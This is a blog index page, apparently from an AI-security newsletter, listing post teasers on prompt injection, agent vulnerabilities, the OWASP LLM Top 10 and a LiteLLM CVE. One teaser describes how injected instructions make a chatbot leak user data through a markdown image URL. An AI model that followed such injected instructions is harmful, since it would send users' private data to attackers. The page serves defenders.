All posts

• LLM Prompt Injection Attack Examples: Direct, Indirect, and Agentic Exploits

  A practitioner-level breakdown of LLM prompt injection attack examples — from basic instruction overrides to CVE-rated zero-click exploits in production agentic systems.

  June 12, 2026

• AI Sec Weekly: Friday, May 22, 2026

  This week's digest: SSRF through agent tool-use, the model supply-chain class and why safetensors matters, and model extraction as a business risk. Plus one regulatory item, one technical item, and the reading list. Verify specifics against primary sources.

  May 21, 2026

• AI on the Offense: Google's Zero-Day Warning, Reasoning-Model Jailbreaks, and Government Testing

  Google says it caught an attacker using an LLM to find a zero-day, peer-reviewed research shows reasoning models can autonomously jailbreak other models, and CAISI signs frontier-model testing deals. What's signal, what's hype, and what to actually do.

  May 20, 2026

• How LLM Chatbots Leak Data Through Their Own Rendered Output

  A recurring AI-security finding: an injected instruction makes the model emit a markdown image whose URL carries the user's data to an attacker server. Why this works, why CSP is the real fix, and what to check this week.

  May 15, 2026

• AI Sec Weekly: Friday, May 15, 2026

  This week's digest: indirect injection becomes the agent-era default, the markdown-rendering data-exfiltration class, and why system-prompt secrecy keeps failing. Plus one regulatory item, one technical item, and the reading list. Verify specifics against primary sources.

  May 14, 2026

• The LiteLLM SQL Injection (CVE-2026-42208) and Why AI Gateways Are Crown Jewels

  A pre-auth SQL injection in the LiteLLM proxy landed in CISA's KEV catalog and was exploited within roughly 36 hours of disclosure. The bug is ordinary; the lesson is about where your AI stack concentrates secrets. What to check this week.

  May 13, 2026

• Indirect Prompt Injection: The Agent Era's Default Vulnerability

  As LLM agents gained tools and memory, the dangerous injection stopped coming from the user and started coming from the data the agent reads. A defender's breakdown of why this class resists patching and what containment looks like.

  May 11, 2026

• The OWASP LLM Top 10 (2025) Changed More Than the Numbering

  The 2025 revision of the OWASP Top 10 for LLM Applications added system-prompt leakage and vector/embedding weaknesses, and reframed the supply-chain entry. Here's what actually shifted and why it matters for defenders.

  May 8, 2026

• How AI Sec Weekly Works: The Format and Why It Looks This Way

  Every Friday digest follows the same structure for a reason. Here's the format breakdown — three top stories, the reading list, and what gets left out.

  May 6, 2026

• What this site is for

  AI Sec Weekly covers cybersecurity news with an engineer's filter. Here's what we publish.

  May 2, 2026